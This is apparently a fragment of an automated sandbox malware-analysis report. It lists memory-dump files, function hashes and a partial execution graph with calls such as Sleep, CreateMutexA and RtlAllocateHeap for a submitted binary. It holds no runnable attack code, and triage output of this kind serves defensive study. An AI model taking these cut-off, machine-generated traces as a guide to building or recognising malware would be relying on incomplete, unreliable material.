                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                              • Instruction ID: f5e1cda3016284ba3ce59eec65bbe27ed5f1b43a62bcc6c407ac184cb188550c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63E08C72921228EBCB14DB98C904D8AF7ECEB49B00F750096F501D3150C270DE00C7D4
                                                                                                                                                                                                                              Function 00B02EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 32384418-0
                                                                                                                                                                                                                              • Opcode ID: 99a8f2e08568afdad147a6ae983ac894fb22e8959140c103a06a8eb9a42b626a
                                                                                                                                                                                                                              • Instruction ID: 2f920033ffdc217d76a74a22dc3b10c43bef270af34d71267e663e51d900d28d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99a8f2e08568afdad147a6ae983ac894fb22e8959140c103a06a8eb9a42b626a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11A1F170A01215AFDB10DFA5C849BAABBE8FF19750F4481A9E815D7281EB31EA44CBD1
                                                                                                                                                                                                                              Function 00B3CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                                                                              • Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                                                                                                              • Instruction ID: ac02ff5346b40da56abdcf048b286cc8291d096b7ecb20b76dba2e18153c74ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7B104329046559FDB15CFA8C8817AEBFE5EF55340F3481EAE855FB242D634AE01CBA0
                                                                                                                                                                                                                              Function 00B1BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 531285432-0
                                                                                                                                                                                                                              • Opcode ID: 0d639f017a9861d84bc8bd4fe8e81cd3e81e2b1b64e70e1f068c677cd38d3c3d
                                                                                                                                                                                                                              • Instruction ID: d6ee8740355e764bf736389dfa929872598d67a971779d4acc005fc1e48836c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d639f017a9861d84bc8bd4fe8e81cd3e81e2b1b64e70e1f068c677cd38d3c3d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1212C71A00219AFDF00EFA4DC85DFEBBB9EF09710F9000A5F901A7261DB349D859BA1

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:0.9%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                              Total number of Nodes:1900
                                                                                                                                                                                                                              Total number of Limit Nodes:15
                                                                                                                                                                                                                              execution_graph 11662 bd9ab8 11664 bd9acc 11662->11664 11665 bd9b08 11664->11665 11666 bd9b4b shared_ptr 11665->11666 11670 bda917 11665->11670 11667 bd9b59 11666->11667 11668 bd9b65 11666->11668 11672 be80c0 RtlAllocateHeap 11667->11672 11669 be7a00 RtlAllocateHeap 11668->11669 11671 bd9b74 11669->11671 11673 bda953 Sleep CreateMutexA 11670->11673 11674 c06c6a RtlAllocateHeap 11670->11674 11675 bd5c10 4 API calls 11671->11675 11676 bda903 11672->11676 11678 bda98e 11673->11678 11674->11673 11677 bd9b7c 11675->11677 11691 bd8b30 11677->11691 11680 bd9b8d 11681 be8220 RtlAllocateHeap 11680->11681 11682 bd9b9c 11681->11682 11683 be7a00 RtlAllocateHeap 11682->11683 11684 bd9ca9 11683->11684 11685 bd5c10 4 API calls 11684->11685 11686 bd9cb1 11685->11686 11687 bd8b30 4 API calls 11686->11687 11688 bd9cc2 11687->11688 11689 be8220 RtlAllocateHeap 11688->11689 11690 bd9cd1 11689->11690 11692 bd8b7c 11691->11692 11693 be7a00 RtlAllocateHeap 11692->11693 11694 bd8b8c 11693->11694 11695 bd5c10 4 API calls 11694->11695 11696 bd8b97 11695->11696 11697 be80c0 RtlAllocateHeap 11696->11697 11698 bd8be3 11697->11698 11699 be80c0 RtlAllocateHeap 11698->11699 11700 bd8c35 11699->11700 11701 be8220 RtlAllocateHeap 11700->11701 11702 bd8c47 shared_ptr 11701->11702 11703 bd8d01 shared_ptr std::invalid_argument::invalid_argument 11702->11703 11704 c06c6a RtlAllocateHeap 11702->11704 11703->11680 11705 bd8d2d 11704->11705 11706 be7a00 RtlAllocateHeap 11705->11706 11707 bd8d8f 11706->11707 11708 bd5c10 4 API calls 11707->11708 11709 bd8d9a 11708->11709 11710 be80c0 RtlAllocateHeap 11709->11710 11711 bd8dec 11710->11711 11712 be8220 RtlAllocateHeap 11711->11712 11714 bd8dfe shared_ptr 11712->11714 11713 bd8e7e shared_ptr std::invalid_argument::invalid_argument 11713->11680 11714->11713 11715 c06c6a RtlAllocateHeap 11714->11715 11716 bd8eaa 11715->11716 11717 be7a00 RtlAllocateHeap 11716->11717 11718 bd8f0f 11717->11718 11719 bd5c10 4 API calls 11718->11719 11720 bd8f1a 11719->11720 11721 be80c0 RtlAllocateHeap 11720->11721 11722 bd8f6c 11721->11722 11723 be8220 RtlAllocateHeap 11722->11723 11724 bd8f7e shared_ptr 11723->11724 11725 bd8ffe shared_ptr std::invalid_argument::invalid_argument 11724->11725 11726 c06c6a RtlAllocateHeap 11724->11726 11725->11680 11727 bd902a 11726->11727 11728 bd42b0 11731 bd3ac0 11728->11731 11730 bd42bb shared_ptr 11732 bd3af9 11731->11732 11733 c06c6a RtlAllocateHeap 11732->11733 11738 bd3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11732->11738 11734 bd3be6 11733->11734 11735 bd32d0 6 API calls 11734->11735 11737 bd3c38 11734->11737 11735->11737 11736 bd32d0 6 API calls 11740 bd3c5f 11736->11740 11737->11736 11737->11740 11738->11730 11739 bd3c68 11739->11730 11740->11739 11741 bd3810 4 API calls 11740->11741 11742 bd3cdb 11741->11742 9860 bd5cad 9862 bd5caf shared_ptr 9860->9862 9861 bd5d17 shared_ptr std::invalid_argument::invalid_argument 9862->9861 9863 c06c6a RtlAllocateHeap 9862->9863 9864 bd5d47 __cftof 9863->9864 9864->9864 9865 be80c0 RtlAllocateHeap 9864->9865 9867 bd5e3e 9865->9867 9866 bd5ea6 shared_ptr std::invalid_argument::invalid_argument 9867->9866 9868 c06c6a RtlAllocateHeap 9867->9868 9869 bd5ed2 9868->9869 9870 bd5ffe shared_ptr std::invalid_argument::invalid_argument 9869->9870 9871 c06c6a RtlAllocateHeap 9869->9871 9872 bd601b 9871->9872 9873 be80c0 RtlAllocateHeap 9872->9873 9874 bd6089 9873->9874 9875 be80c0 RtlAllocateHeap 9874->9875 9876 bd60bd 9875->9876 9877 be80c0 RtlAllocateHeap 9876->9877 9878 bd60ee 9877->9878 9879 be80c0 RtlAllocateHeap 9878->9879 9880 bd611f 9879->9880 9881 be80c0 RtlAllocateHeap 9880->9881 9883 bd6150 9881->9883 9882 bd65b1 shared_ptr std::invalid_argument::invalid_argument 9883->9882 9884 c06c6a RtlAllocateHeap 9883->9884 9885 bd65dc 9884->9885 9908 be7a00 9885->9908 9887 bd66a6 9922 bd5c10 9887->9922 9889 bd66ac 9890 bd5c10 4 API calls 9889->9890 9891 bd66b1 9890->9891 9973 bd22c0 9891->9973 9893 bd66c9 shared_ptr 9894 be7a00 RtlAllocateHeap 9893->9894 9895 bd6732 9894->9895 9896 bd5c10 4 API calls 9895->9896 9897 bd673d 9896->9897 9898 bd22c0 4 API calls 9897->9898 9907 bd6757 shared_ptr 9898->9907 9899 bd6852 9900 be80c0 RtlAllocateHeap 9899->9900 9902 bd689c 9900->9902 9901 be7a00 RtlAllocateHeap 9901->9907 9903 be80c0 RtlAllocateHeap 9902->9903 9906 bd68e3 shared_ptr std::invalid_argument::invalid_argument 9903->9906 9904 bd5c10 4 API calls 9904->9907 9905 bd22c0 4 API calls 9905->9907 9907->9899 9907->9901 9907->9904 9907->9905 9909 be7a26 9908->9909 9910 be7a2d 9909->9910 9911 be7a62 9909->9911 